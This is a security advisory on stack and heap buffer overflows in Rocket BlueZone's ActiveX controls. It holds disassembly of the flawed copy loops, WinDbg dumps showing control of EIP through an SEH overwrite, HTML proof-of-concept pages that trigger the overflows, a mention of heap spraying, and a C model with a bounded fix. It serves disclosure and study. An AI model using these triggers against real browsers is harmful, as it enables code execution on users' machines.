1001E4D1 E957FFFFFF       jmp L1001E42D
1001E4D6 L1001E4D6:
1001E4D6 83E872           sub eax,00000072h
1001E4D9 7446             jz L1001E521
1001E4DB 48               dec eax
1001E4DC 741C             jz L1001E4FA
1001E4DE 48               dec eax
1001E4DF 7412             jz L1001E4F3
1001E4E1 48               dec eax
1001E4E2 48               dec eax
1001E4E3 0F8432FFFFFF     jz L1001E41B
1001E4E9 48               dec eax
1001E4EA 7543             jnz L1001E52F
1001E4EC 68D8C00310       push SSZ1003C0D8_Seagull
1001E4F1 EB33             jmp L1001E526
1001E4F3 L1001E4F3:
1001E4F3 68D0C00310       push SSZ1003C0D0_Telnet
1001E4F8 EB2C             jmp L1001E526
1001E4FA L1001E4FA:
1001E4FA 8A87C7050000     mov al,[edi+000005C7h]
1001E500 84C0             test al,al
1001E502 7507             jnz L1001E50B
1001E504 68BCC00310       push SSZ1003C0BC_IBM_3270_Terminal
1001E509 EB1B             jmp L1001E526
1001E50B L1001E50B:
1001E50B 3C01             cmp al,01h
1001E50D 7507             jnz L1001E516
1001E50F 68A8C00310       push SSZ1003C0A8_IBM_5250_Terminal
1001E514 EB10             jmp L1001E526
1001E516 L1001E516:
1001E516 3C02             cmp al,02h
1001E518 7515             jnz L1001E52F
1001E51A 689CC00310       push SSZ1003C09C_VT_Terminal
1001E51F EB05             jmp L1001E526
1001E521 L1001E521:
1001E521 68AC4A0310       push SSZ10034AAC_BlueZone
1001E526 L1001E526:
1001E526 8D85FCFEFFFF     lea eax,[ebp-00000104h]
1001E52C L1001E52C:
1001E52C 50               push eax
1001E52D FFD6             call esi
1001E52F L1001E52F:
1001E52F 8D85FCFEFFFF     lea eax,[ebp-00000104h]
1001E535 50               push eax
1001E536 FF1558310310     call [KERNEL32.dll!lstrlenA]
1001E53C 8BD8             mov ebx,eax
1001E53E 8B85F8FBFFFF     mov eax,[ebp-00000408h]
1001E544 EB0A             jmp L1001E550
1001E546 L1001E546:
1001E546 8A08             mov cl,[eax]                     \
1001E548 888C1DFCFEFFFF   mov [ebp+ebx-00000104h],cl       | <---------------- boom
1001E54F 43               inc ebx                          |
1001E550 L1001E550:                                        |
1001E550 40               inc eax                          |
1001E551 40               inc eax                          |
1001E552 66833800         cmp word ptr [eax],0000h         |
1001E556 0F8574FEFFFF     jnz L1001E3D0                    /
1001E55C L1001E55C:
1001E55C 6800010000       push 00000100h
1001E561 8D85FCFBFFFF     lea eax,[ebp-00000404h]
1001E567 50               push eax
1001E568 6AFF             push FFFFFFFFh
1001E56A 8D85FCFEFFFF     lea eax,[ebp-00000104h]
1001E570 50               push eax
1001E571 6A01             push 00000001h
1001E573 6A00             push 00000000h
1001E575 FF1554310310     call [KERNEL32.dll!MultiByteToWideChar]
1001E57B 8D85FCFBFFFF     lea eax,[ebp-00000404h]
1001E581 50               push eax
1001E582 FF15A0320310     call [OLEAUT32.dll!OLEAUT32.2]
1001E588 8BF0             mov esi,eax
1001E58A 8B07             mov eax,[edi]
1001E58C 56               push esi
1001E58D 57               push edi
1001E58E FF90B8030000     call [eax+000003B8h]
1001E594 56               push esi
1001E595 FF15A8320310     call [OLEAUT32.dll!OLEAUT32.6]
1001E59B 8B4DFC           mov ecx,[ebp-04h]
1001E59E 5F               pop edi
1001E59F 5E               pop esi
1001E5A0 33CD             xor ecx,ebp
1001E5A2 33C0             xor eax,eax
1001E5A4 5B               pop ebx
1001E5A5 E8A2260100       call SUB_L10030C4C
1001E5AA C9               leave
1001E5AB C20800           retn 0008h
;----------------------------------------------------------------------------------------------------
Proof of Concept
<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
var x = "";
for (i=0; i<13000; i++){
    x = x + "A";
}
obj.StatusBarText = x;
</script>
WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class
According to the IObjectSafety interface the control is safe for scripting and safe for initialization, so Internet Explorer will allow scripts to call the methods and properties of the object, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX control offers the GetOpenFilename() method, see typelib:
...
/* DISPID=277 */
/* VT_BSTR [8] */
function GetOpenFilename(
    /* VT_VARIANT [12] [in] */ $FileFilter,      <-----------------
    /* VT_VARIANT [12] [in] */ $FilterIndex,
    /* VT_VARIANT [12] [in] */ $Title,
    /* VT_VARIANT [12] [in] */ $ButtonText
)
{
    /* method GetOpenFilename */
}
...
This method suffers from a stack-based buffer overflow caused by an overlong FileFilter argument, which is copied by an unbounded loop inside bzwhll.dll. See the vulnerable code below.
WinDBG shows:

eax=015f0000 ebx=00000000 ecx=0000308c edx=00000041 esi=02c96d64 edi=0321f5b0
eip=031f4883 esp=015ecbf8 ebp=015ecc84 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18dc8:
031f4883 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(7350.624c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec828 ebp=015ec848 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???

vulnerable code, see bzwhll.dll:
;----------------------------------------------------------------------------------------------------
100247B0 L100247B0:
100247B0 55                 push ebp
100247B1 8DAC2404FBFFFF     lea ebp,[esp-000004FCh]
100247B8 81EC7C050000       sub esp,0000057Ch
100247BE A1F4EC0410         mov eax,[L1004ECF4]
100247C3 33C5               xor eax,ebp
100247C5 8985F8040000       mov [ebp+000004F8h],eax
100247CB 8B8504050000       mov eax,[ebp+00000504h]
100247D1 53                 push ebx
100247D2 56                 push esi
100247D3 57                 push edi
100247D4 8945D8             mov [ebp-28h],eax
100247D7 8B8548050000       mov eax,[ebp+00000548h]
100247DD 33DB               xor ebx,ebx
100247DF 6802010000         push 00000102h
100247E4 8945DC             mov [ebp-24h],eax
100247E7 8D85F6030000       lea eax,[ebp+000003F6h]
100247ED 53                 push ebx
100247EE 50                 push eax
100247EF 66899DF4030000     mov [ebp+000003F4h],bx
100247F6 E891C40000         call jmp_MSVCR80.dll!memset
100247FB BED8DB0310         mov esi,SSZ1003DBD8_All_Files
10024800 8DBDF0020000       lea edi,[ebp+000002F0h]
10024806 A5                 movsd
10024807 A5                 movsd
10024808 A5                 movsd
10024809 68F4000000         push 000000F4h
1002480E 8D8500030000       lea eax,[ebp+00000300h]
10024814 53                 push ebx
10024815 50                 push eax
10024816 895DE0             mov [ebp-20h],ebx
10024819 A5                 movsd
1002481A E86DC40000         call jmp_MSVCR80.dll!memset
1002481F 6802010000         push 00000102h
10024824 8D85EE010000       lea eax,[ebp+000001EEh]
1002482A 53                 push ebx
1002482B 50                 push eax
1002482C 66899DEC010000     mov [ebp+000001ECh],bx
10024833 E854C40000         call jmp_MSVCR80.dll!memset
10024838 83C424             add esp,00000024h
1002483B 68E8DB0310         push SSZ1003DBE8_Open
10024840 BFB0F50410         mov edi,L1004F5B0
10024845 57                 push edi
10024846 FF155C300310       call [KERNEL32.dll!lstrcpyA]
1002484C 6683BD080500000A   cmp word ptr [ebp+00000508h],000Ah
10024854 7440               jz L10024896
10024856 66399D08050000     cmp [ebp+00000508h],bx
1002485D 7437               jz L10024896
1002485F 8D8508050000       lea eax,[ebp+00000508h]
10024865 50                 push eax
10024866 E8CCEDFEFF         call SUB_L10013637
1002486B 59                 pop ecx
1002486C 8945D4             mov [ebp-2Ch],eax
1002486F 33C9               xor ecx,ecx
10024871 L10024871:
10024871 8B45D4             mov eax,[ebp-2Ch]                 \
10024874 8D3448             lea esi,[eax+ecx*2]               |
10024877 8A16               mov dl,[esi]                      |
10024879 80FA2C             cmp dl,2Ch                        |
1002487C 8D840DF0020000     lea eax,[ebp+ecx+000002F0h]       |
10024883 8810               mov [eax],dl                      | <---------- boom
10024885 7502               jnz L10024889                     |
10024887 8818               mov [eax],bl                      |
10024889 L10024889:                                           |
10024889 41                 inc ecx                           |
1002488A 66391E             cmp [esi],bx                      |
1002488D 75E2               jnz L10024871                     /
1002488F 889C0DF1020000     mov [ebp+ecx+000002F1h],bl
10024896 L10024896:
10024896 6683BD180500000A   cmp word ptr [ebp+00000518h],000Ah
1002489E 7413               jz L100248B3
100248A0 66399D18050000     cmp [ebp+00000518h],bx
100248A7 740A               jz L100248B3
100248A9 0FB68520050000     movzx eax,[ebp+00000520h]
100248B0 8945E0             mov [ebp-20h],eax
100248B3 L100248B3:
100248B3 BE04010000         mov esi,00000104h
100248B8 56                 push esi
100248B9 8D85EC010000       lea eax,[ebp+000001ECh]
100248BF 50                 push eax
100248C0 8D8528050000       lea eax,[ebp+00000528h]
100248C6 50                 push eax
100248C7 E807EEFEFF         call SUB_L100136D3
100248CC 56                 push esi
100248CD 8D8538050000       lea eax,[ebp+00000538h]
100248D3 57                 push edi
100248D4 50                 push eax
100248D5 E8F9EDFEFF         call SUB_L100136D3
100248DA 83C418             add esp,00000018h
100248DD 8D45CC             lea eax,[ebp-34h]
100248E0 50                 push eax
100248E1 C745CC08000000     mov dword ptr [ebp-34h],00000008h
100248E8 C745D0FF020000     mov dword ptr [ebp-30h],000002FFh
100248EF FF1550300310       call [COMCTL32.dll!InitCommonControlsEx]
100248F5 6A4C               push 0000004Ch
100248F7 5F                 pop edi
100248F8 57                 push edi
100248F9 8D4580             lea eax,[ebp-80h]
100248FC 53                 push ebx
100248FD 50                 push eax
100248FE E889C30000         call jmp_MSVCR80.dll!memset
10024903 8B45D8             mov eax,[ebp-28h]
10024906 8B806B560000       mov eax,[eax+0000566Bh]
1002490C 894584             mov [ebp-7Ch],eax
1002490F 8D85F0020000       lea eax,[ebp+000002F0h]
10024915 89458C             mov [ebp-74h],eax
10024918 8B45E0             mov eax,[ebp-20h]
1002491B 894598             mov [ebp-68h],eax
1002491E 8D85F4030000       lea eax,[ebp+000003F4h]
10024924 89459C             mov [ebp-64h],eax
10024927 8D85EC010000       lea eax,[ebp+000001ECh]
1002492D 8945B0             mov [ebp-50h],eax
10024930 83C40C             add esp,0000000Ch
10024933 8D4580             lea eax,[ebp-80h]
10024936 50                 push eax
10024937 897D80             mov [ebp-80h],edi
1002493A 895D88             mov [ebp-78h],ebx
1002493D 895D90             mov [ebp-70h],ebx
10024940 895D94             mov [ebp-6Ch],ebx
10024943 8975A0             mov [ebp-60h],esi
10024946 895DA4             mov [ebp-5Ch],ebx
10024949 895DA8             mov [ebp-58h],ebx
1002494C 895DAC             mov [ebp-54h],ebx
1002494F C745B420100800     mov dword ptr [ebp-4Ch],00081020h
10024956 895DBC             mov [ebp-44h],ebx
10024959 895DC0             mov [ebp-40h],ebx
1002495C C745C44E450210     mov dword ptr [ebp-3Ch],L1002454E
10024963 895DC8             mov [ebp-38h],ebx
10024966 FF15E4330310       call [comdlg32.dll!GetOpenFileNameA]
1002496C 85C0               test eax,eax
1002496E 7506               jnz L10024976
10024970 889DF4030000       mov [ebp+000003F4h],bl
10024976 L10024976:
10024976 56                 push esi
10024977 8D45E4             lea eax,[ebp-1Ch]
1002497A 50                 push eax
1002497B 6AFF               push FFFFFFFFh
1002497D 8D85F4030000       lea eax,[ebp+000003F4h]
10024983 50                 push eax
10024984 6A01               push 00000001h
10024986 53                 push ebx
10024987 FF1554310310       call [KERNEL32.dll!MultiByteToWideChar]
1002498D 8D45E4             lea eax,[ebp-1Ch]
10024990 50                 push eax
10024991 FF15A0320310       call [OLEAUT32.dll!OLEAUT32.2]
10024997 8B4DDC             mov ecx,[ebp-24h]
1002499A 8901               mov [ecx],eax
1002499C 8B8DF8040000       mov ecx,[ebp+000004F8h]
100249A2 5F                 pop edi
100249A3 5E                 pop esi
100249A4 33CD               xor ecx,ebp
100249A6 33C0               xor eax,eax
100249A8 5B                 pop ebx
100249A9 E89EC20000         call SUB_L10030C4C
100249AE 81C5FC040000       add ebp,000004FCh
100249B4 C9                 leave
100249B5 C24800             retn 0048h
;----------------------------------------------------------------------------------------------------
Proof of Concept
<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
// 13000-character FileFilter: the copy loop writes it, byte by byte,
// into the fixed-size stack buffer at [ebp+2F0h]
var x = "";
for (i=0; i<13000; i++){
  x = x + "A";
}
obj.GetOpenFilename(x,"","","");
</script>
</html>
WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class
According to the IObjectSafety interface the control is marked safe for scripting and safe for initialization, so Internet Explorer allows the object's methods and properties to be scripted from a web page, subject to the browser's security zone settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The control exposes the GetSaveAsFilename() method; from the typelib:

...
/* DISPID=276 */
/* VT_BSTR [8] */
function GetSaveAsFilename(
    /* VT_VARIANT [12] [in] */ $InitialFilename,
    /* VT_VARIANT [12] [in] */ $FileFilter,        <----------------------
    /* VT_VARIANT [12] [in] */ $FilterIndex,
    /* VT_VARIANT [12] [in] */ $Title,
    /* VT_VARIANT [12] [in] */ $ButtonText
)
{
    /* method GetSaveAsFilename */
}
...
The second argument, FileFilter, is converted to a string and copied into a fixed-size stack buffer by a loop in bzwhll.dll that turns every ',' into a NUL, building the double-NUL-terminated lpstrFilter string that GetSaveFileNameA() expects. The loop stops only at the end of the input and never checks the size of the destination: the 0x104 bytes between the filter buffer at [ebp+2F4h] and the filename buffer at [ebp+3F8h]. A FileFilter longer than that overwrites the rest of the stack frame and the SEH records above it. The vulnerable code is shown below.
WinDbg shows:

(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=015f0000 ebx=00000000 ecx=0000309c edx=00000041 esi=00000104 edi=0324f5b0
eip=0322467d esp=015ecbe4 ebp=015ecc70 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
bzwhll!DllGetClassObject+0x18bc2:
0322467d 8810            mov     byte ptr [eax],dl          ds:0023:015f0000=4d
0:008> g
(eec.fd8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015ec814 ebp=015ec834 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???

The first exception is the copy loop itself running off the top of the stack: ecx=309Ch bytes of 'A' (edx=41) have been written from [ebp+2F4h] when the write to 015f0000 (015ecc70 + 2F4h + 309Ch) faults. Exception dispatch then walks the SEH chain, whose handler pointer lies inside the overwritten region, and execution lands at eip=41414141. Because the fault happens inside the loop, the security cookie check in the function's epilogue (mov ecx,[ebp+4FCh] / xor ecx,ebp / call SUB_L10030C4C) never runs, so the SEH pointers are what give control of EIP.

vulnerable code, bzwhll.dll (the disassembler rendered the prologue as raw bytes; decoded, 55 8D AC 24 00 FB FF FF 81 EC 80 05 00 00 is push ebp / lea ebp,[esp-500h] / sub esp,580h, A1 F4 EC 04 10 33 C5 89 85 FC 04 00 00 loads the cookie from L1004ECF4, xors it with ebp and stores it at [ebp+4FCh], and 8B 85 08 05 00 00 is mov eax,[ebp+508h]):
;----------------------------------------------------------------------------------------------------
1002458B L1002458B:
1002458B 55 db 55h; 'U'
1002458C 8D db 8Dh; '?'
1002458D AC db ACh; '¿'
1002458E 24 db 24h; '$'
1002458F 00 db 00h;
10024590 FB db FBh; 'ë'
10024591 FF db FFh; 'ï'
10024592 FF db FFh; 'ï'
10024593 81 db 81h; '?'
10024594 EC db ECh; '¬'
10024595 80 db 80h; '?'
10024596 05 db 05h;
10024597 00 db 00h;
10024598 00 db 00h;
10024599 A1 db A1h; 'ö'
1002459A F4EC0410 dd L1004ECF4
1002459E 33 db 33h; '3'
1002459F C5 db C5h; '…'
100245A0 89 db 89h; '%'
100245A1 85 db 85h; ':'
100245A2 FC db FCh; 'ì'
100245A3 04 db 04h;
100245A4 00 db 00h;
100245A5 00 db 00h;
100245A6 8B db 8Bh; '<'
100245A7 85 db 85h; ':'
100245A8 08 db 08h;
100245A9 05 db 05h;
100245AA 00 db 00h;
100245AB 00 db 00h;
100245AC 53 push ebx
100245AD 56 push esi
100245AE 57 push edi
100245AF 8945D8 mov [ebp-28h],eax
100245B2 8B855C050000 mov eax,[ebp+0000055Ch]
100245B8 33DB xor ebx,ebx
100245BA 6802010000 push 00000102h
100245BF 8945E0 mov [ebp-20h],eax
100245C2 8D85FA030000 lea eax,[ebp+000003FAh]
100245C8 53 push ebx
100245C9 50 push eax
100245CA 66899DF8030000 mov [ebp+000003F8h],bx
100245D1 E8B6C60000 call jmp_MSVCR80.dll!memset
100245D6 BED8DB0310 mov esi,SSZ1003DBD8_All_Files
100245DB 8DBDF4020000 lea edi,[ebp+000002F4h]
100245E1 A5 movsd
100245E2 A5 movsd
100245E3 A5 movsd
100245E4 68F4000000 push 000000F4h
100245E9 8D8504030000 lea eax,[ebp+00000304h]
100245EF 53 push ebx
100245F0 50 push eax
100245F1 895DE4 mov [ebp-1Ch],ebx
100245F4 A5 movsd
100245F5 E892C60000 call jmp_MSVCR80.dll!memset
100245FA 6802010000 push 00000102h
100245FF 8D85F2010000 lea eax,[ebp+000001F2h]
10024605 53 push ebx
10024606 50 push eax
10024607 66899DF0010000 mov [ebp+000001F0h],bx
1002460E E879C60000 call jmp_MSVCR80.dll!memset
10024613 83C424 add esp,00000024h
10024616 68D0DB0310 push SSZ1003DBD0_Save
1002461B BFB0F50410 mov edi,L1004F5B0
10024620 57 push edi
10024621 FF155C300310 call [KERNEL32.dll!lstrcpyA]
10024627 BE04010000 mov esi,00000104h
1002462C 56 push esi
1002462D 8D85F8030000 lea eax,[ebp+000003F8h]
10024633 50 push eax
10024634 8D850C050000 lea eax,[ebp+0000050Ch]
1002463A 50 push eax
1002463B E893F0FEFF call SUB_L100136D3
10024640 83C40C add esp,0000000Ch
10024643 6683BD1C0500000A cmp word ptr [ebp+0000051Ch],000Ah
1002464B 7446 jz L10024693
1002464D 66399D1C050000 cmp [ebp+0000051Ch],bx
10024654 743D jz L10024693
10024656 8D851C050000 lea eax,[ebp+0000051Ch]
1002465C 50 push eax
1002465D E8D5EFFEFF call SUB_L10013637
10024662 59 pop ecx
10024663 8945DC mov [ebp-24h],eax
10024666 33C9 xor ecx,ecx
10024668 L10024668:
10024668 8B45DC mov eax,[ebp-24h]                    \
1002466B 8D0448 lea eax,[eax+ecx*2]                  |
1002466E 8A10 mov dl,[eax]                           |
10024670 80FA2C cmp dl,2Ch                           |
10024673 8945D4 mov [ebp-2Ch],eax                    |
10024676 8D840DF4020000 lea eax,[ebp+ecx+000002F4h]  |
1002467D 8810 mov [eax],dl                           | <--------- crash
1002467F 7502 jnz L10024683                          |
10024681 8818 mov [eax],bl                           |
10024683 L10024683:                                  |
10024683 8B45D4 mov eax,[ebp-2Ch]                    |
10024686 41 inc ecx                                  |
10024687 663918 cmp [eax],bx                         |
1002468A 75DC jnz L10024668                          /
1002468C 889C0DF5020000 mov [ebp+ecx+000002F5h],bl
10024693 L10024693:
10024693 6683BD2C0500000A cmp word ptr [ebp+0000052Ch],000Ah
1002469B 7413 jz L100246B0
1002469D 66399D2C050000 cmp [ebp+0000052Ch],bx
100246A4 740A jz L100246B0
100246A6 0FB68534050000 movzx eax,[ebp+00000534h]
100246AD 8945E4 mov [ebp-1Ch],eax
100246B0 L100246B0:
100246B0 56 push esi
100246B1 8D85F0010000 lea eax,[ebp+000001F0h]
100246B7 50 push eax
100246B8 8D853C050000 lea eax,[ebp+0000053Ch]
100246BE 50 push eax
100246BF E80FF0FEFF call SUB_L100136D3
100246C4 56 push esi
100246C5 8D854C050000 lea eax,[ebp+0000054Ch]
100246CB 57 push edi
100246CC 50 push eax
100246CD E801F0FEFF call SUB_L100136D3
100246D2 83C418 add esp,00000018h
100246D5 8D45CC lea eax,[ebp-34h]
100246D8 50 push eax
100246D9 C745CC08000000 mov dword ptr [ebp-34h],00000008h
100246E0 C745D0FF020000 mov dword ptr [ebp-30h],000002FFh
100246E7 FF1550300310 call [COMCTL32.dll!InitCommonControlsEx]
100246ED 6A4C push 0000004Ch
100246EF 5F pop edi
100246F0 57 push edi
100246F1 8D4580 lea eax,[ebp-80h]
100246F4 53 push ebx
100246F5 50 push eax
100246F6 E891C50000 call jmp_MSVCR80.dll!memset
100246FB 8B45D8 mov eax,[ebp-28h]
100246FE 8B806B560000 mov eax,[eax+0000566Bh]
10024704 894584 mov [ebp-7Ch],eax
10024707 8D85F4020000 lea eax,[ebp+000002F4h]
1002470D 89458C mov [ebp-74h],eax
10024710 8B45E4 mov eax,[ebp-1Ch]
10024713 894598 mov [ebp-68h],eax
10024716 8D85F8030000 lea eax,[ebp+000003F8h]
1002471C 89459C mov [ebp-64h],eax
1002471F 8D85F0010000 lea eax,[ebp+000001F0h]
10024725 8945B0 mov [ebp-50h],eax
10024728 83C40C add esp,0000000Ch
1002472B 8D4580 lea eax,[ebp-80h]
1002472E 50 push eax
1002472F 897D80 mov [ebp-80h],edi
10024732 895D88 mov [ebp-78h],ebx
10024735 895D90 mov [ebp-70h],ebx
10024738 895D94 mov [ebp-6Ch],ebx
1002473B 8975A0 mov [ebp-60h],esi
1002473E 895DA4 mov [ebp-5Ch],ebx
10024741 895DA8 mov [ebp-58h],ebx
10024744 895DAC mov [ebp-54h],ebx
10024747 C745B420000900 mov dword ptr [ebp-4Ch],00090020h
1002474E 895DBC mov [ebp-44h],ebx
10024751 895DC0 mov [ebp-40h],ebx
10024754 C745C44E450210 mov dword ptr [ebp-3Ch],L1002454E
1002475B 895DC8 mov [ebp-38h],ebx
1002475E FF15E0330310 call [comdlg32.dll!GetSaveFileNameA]
10024764 85C0 test eax,eax
10024766 7506 jnz L1002476E
10024768 889DF8030000 mov [ebp+000003F8h],bl
1002476E L1002476E:
1002476E 56 push esi
1002476F 8D45E8 lea eax,[ebp-18h]
10024772 50 push eax
10024773 6AFF push FFFFFFFFh
10024775 8D85F8030000 lea eax,[ebp+000003F8h]
1002477B 50 push eax
1002477C 6A01 push 00000001h
1002477E 53 push ebx
1002477F FF1554310310 call [KERNEL32.dll!MultiByteToWideChar]
10024785 8D45E8 lea eax,[ebp-18h]
10024788 50 push eax
10024789 FF15A0320310 call [OLEAUT32.dll!OLEAUT32.2]
1002478F 8B4DE0 mov ecx,[ebp-20h]
10024792 8901 mov [ecx],eax
10024794 8B8DFC040000 mov ecx,[ebp+000004FCh]
1002479A 5F pop edi
1002479B 5E pop esi
1002479C 33CD xor ecx,ebp
1002479E 33C0 xor eax,eax
100247A0 5B pop ebx
100247A1 E8A6C40000 call SUB_L10030C4C
100247A6 81C500050000 add ebp,00000500h
100247AC C9 leave
100247AD C25800 retn 0058h
;----------------------------------------------------------------------------------------------------
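The filter-conversion loop is the same in GetOpenFilename() (buffer at [ebp+2F0h]) and GetSaveAsFilename() (buffer at [ebp+2F4h]), and it is easier to reason about in C. The following is an added example written for this page, not BlueZone code: it reproduces the loop's semantics (low byte of each UTF-16 unit, ',' turned into NUL, the terminator copied and one more NUL written two bytes further on) against the 0x104-byte buffer implied by the stack layout, then places a bounded version next to it. Function and variable names, and the sample filter string, are the editor's.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILTER_BUF 0x104   /* filter buffer [ebp+2F4h] .. filename buffer [ebp+3F8h] */

/* Mirror of the loop at 10024668..1002468C: copy the low byte of each UTF-16
 * unit, turn ',' into NUL (lpstrFilter is "desc\0pattern\0...\0\0"), copy the
 * terminator, then write one more NUL two bytes further on. The loop never
 * looks at the size of dst. */
static size_t build_filter_unbounded(char *dst, const uint16_t *src)
{
    size_t i = 0;
    for (;;) {
        uint16_t u = src[i];
        dst[i] = ((char)u == ',') ? '\0' : (char)u;   /* cmp dl,2Ch / mov [eax],bl */
        if (u == 0)                                   /* cmp [eax],bx */
            break;
        i++;
    }
    dst[i + 2] = '\0';                                /* mov [ebp+ecx+2F5h],bl, ecx == i+1 */
    return i + 3;                                     /* highest index touched + 1 */
}

/* Bytes the original loop writes for a given input: units + 3. */
static size_t filter_bytes_needed(const uint16_t *src)
{
    size_t n = 0;
    while (src[n] != 0)
        n++;
    return n + 3;
}

/* Hardened form: measure first, refuse input that leaves no room for the
 * double terminator, then copy. Returns the filter length or -1. */
static int build_filter_bounded(char *dst, size_t cap, const uint16_t *src)
{
    size_t n = 0;
    while (src[n] != 0)
        n++;
    if (n + 2 > cap)
        return -1;
    for (size_t i = 0; i < n; i++) {
        char c = (char)src[i];
        dst[i] = (c == ',') ? '\0' : c;
    }
    dst[n] = '\0';
    dst[n + 1] = '\0';
    return (int)n;
}

/* Constructed input modelled on the PoC: n UTF-16 units of 'A'. */
static uint16_t *units_of_A(size_t n)
{
    uint16_t *s = malloc((n + 1) * sizeof *s);
    for (size_t i = 0; i < n; i++)
        s[i] = 'A';
    s[n] = 0;
    return s;
}

/* How many bytes past the 0x104-byte buffer the original loop writes for an
 * n-unit FileFilter (0 when it fits). Computed, not performed. */
size_t overflow_bytes_for(size_t n)
{
    uint16_t *src = units_of_A(n);
    size_t need = filter_bytes_needed(src);
    free(src);
    return need > FILTER_BUF ? need - FILTER_BUF : 0;
}

/* Result of the bounded version on the same input: length or -1. */
int bounded_result_for(size_t n)
{
    uint16_t *src = units_of_A(n);
    char buf[FILTER_BUF];
    int rc = build_filter_bounded(buf, sizeof buf, src);
    free(src);
    return rc;
}

/* Both versions on a normal filter "Text,*.txt,": returns 11 when the output
 * is "Text\0*.txt\0\0" from both, -1 otherwise. */
int sample_filter_ok(void)
{
    static const uint16_t filter[] = {'T','e','x','t',',','*','.','t','x','t',',',0};
    char bounded[FILTER_BUF] = {0};
    char loose[64] = {0};              /* large enough that the loop cannot overrun here */
    int n = build_filter_bounded(bounded, sizeof bounded, filter);
    if (n != 11 || memcmp(bounded, "Text\0*.txt\0\0", 13) != 0)
        return -1;
    if (build_filter_unbounded(loose, filter) != 14 || memcmp(loose, bounded, 13) != 0)
        return -1;
    return n;
}

int main(void)
{
    printf("sample filter: %s\n", sample_filter_ok() == 11 ? "ok" : "mismatch");
    printf("13000 'A's: original loop overruns the buffer by %zu bytes, bounded version returns %d\n",
           overflow_bytes_for(13000), bounded_result_for(13000));
    printf("257 units: overrun %zu; 258 units: overrun %zu (the loop's extra trailing NUL)\n",
           overflow_bytes_for(257), overflow_bytes_for(258));
    return 0;
}
```

The bounded version writes n + 2 bytes where the original writes n + 3 (its second NUL lands at index n + 2, leaving index n + 1 to the earlier memset), which is why 258 units already spill one byte in the original while the bounded form still accepts them.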
Proof of Concept
<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
// 13000-character FileFilter (second argument): copied unchecked into the
// 0x104-byte stack buffer at [ebp+2F4h]
var x = "";
for (i=0; i<13000; i++){
  x = x + "A";
}
obj.GetSaveAsFilename("",x,"","","");
</script>
</html>
LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:
binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): True
description: LIPI Class
According to the IObjectSafety interface the control is marked safe for scripting and safe for initialization, so Internet Explorer allows the object's methods and properties to be scripted from a web page, subject to the browser's security zone settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The control exposes the SendFile() method; from the typelib:

...
/* DISPID=2 */
/* VT_I4 [3] */
function SendFile(
    /* VT_BSTR [8] [in] */ $__MIDL_0014,   <------------------------------
    /* VT_BSTR [8] [in] */ $__MIDL_0015
)
{
    /* method SendFile */
}
...
The first argument, the filename, ends up in a stack buffer at [ebp+410h] and is then appended with lstrcatA() to a fixed-size buffer inside the heap-allocated LIPI object (in the listing below, lpString2 = [ebp+410h] is the source and lpString1 = ebx+88EE2h the destination). No length check is performed, so a long filename overwrites whatever follows that buffer in the object and on the heap.

Note that the UserName and Password properties must be set first; otherwise a login dialog is displayed before the vulnerable call is reached.
When browsing sendfile.html (the second proof of concept below, which sprays the heap with 0x0c0c0c0c before the call), WinDbg shows:

eax=0c0c0c0c ebx=030a9006 ecx=0c0c0c0c edx=0c0c0c0b esi=030a9006 edi=0c0c0c0c
eip=0c0c0c0c esp=015ec890 ebp=015ec8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
